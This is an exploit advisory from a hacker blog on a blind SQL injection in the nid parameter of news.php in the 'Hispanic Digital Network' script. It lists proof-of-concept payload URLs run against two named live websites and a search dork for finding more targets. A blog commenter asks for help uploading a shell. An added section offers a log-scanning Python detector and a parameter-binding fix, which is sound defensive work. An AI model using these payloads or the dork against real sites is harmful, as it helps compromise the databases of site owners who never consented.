
Hispanic Digital Network Blind SQL Injection Vuln

[o] Hispanic Digital Network Blind SQL Injection Vulnerability
Software : Hispanic Digital Network
Vendor : http://www.hdnweb.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/

[o] Vulnerable file
news.php

[o] Exploit
http://localhost/[path]/news.php?nid=[Blind SQL]

[o] Proof of Concept
http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=4 -> false
http://www.lavozindependiente.com/news.php?nid=517+and+substring(@@version,1,1)=5 -> true
http://www.thenewsgramonline.net/news.php?nid=493+and+substring(@@version,1,1)=4 -> false
http://www.thenewsgramonline.net/news.php?nid=493+and+substring(@@version,1,1)=5 -> true
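
Added example (not part of the original advisory): a log check a defender can run to spot the true/false probing shown in the proof of concept. It flags requests to news.php whose nid is not a plain integer, then groups them by client and leading id to surface differing response sizes. The log lines, IP addresses and response sizes are constructed, and the common-log layout is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (common log format); IPs, times and sizes are made up.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /news.php?nid=517 HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /news.php?nid=517+and+substring(@@version,1,1)=4 HTTP/1.1" 200 812
203.0.113.9 - - [01/Jan/2024:10:00:06 +0000] "GET /news.php?nid=517+and+substring(@@version,1,1)=5 HTTP/1.1" 200 5120
203.0.113.20 - - [01/Jan/2024:10:00:09 +0000] "GET /news.php?nid=493%20and%20substring(@@version,1,1)=5 HTTP/1.1" 200 4980
203.0.113.8 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?page=2 HTTP/1.1" 200 2048
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) (\d+|-)')
NID_OK = re.compile(r'\d{1,10}')  # the parameter should only ever be a numeric id

def scan(log_text, script="news.php", param="nid"):
    """Return one finding per request whose id parameter is not a plain integer."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target, status, size = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + script):
            continue
        # parse_qs decodes both '+' and %20, so encoded variants are caught too
        for value in parse_qs(url.query, keep_blank_values=True).get(param, []):
            if not NID_OK.fullmatch(value):
                findings.append({"ip": ip, "value": value, "status": int(status),
                                 "size": 0 if size == "-" else int(size)})
    return findings

def boolean_probes(findings):
    """Group findings by (client, leading id). Different response sizes for
    near-identical requests are the true/false signal a blind test reads."""
    groups = {}
    for f in findings:
        lead = re.match(r'\d*', f["value"]).group()
        groups.setdefault((f["ip"], lead), set()).add(f["size"])
    return {k: sorted(v) for k, v in groups.items() if len(v) > 1}

if __name__ == "__main__":
    for (ip, nid), sizes in boolean_probes(scan(SAMPLE_LOG)).items():
        print(f"{ip} probing nid={nid}: response sizes {sizes}")
```

Any finding at all also marks the fix to make in the application: treat nid as an integer and bind it as a query parameter instead of concatenating it into the SQL string.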

[o] Dork
"powered by Hispanic Digital Network"


[o] Notes
fucking private script again, and all targets are on one IP address. lol

Comments

GIG said…
plz help upload the shell!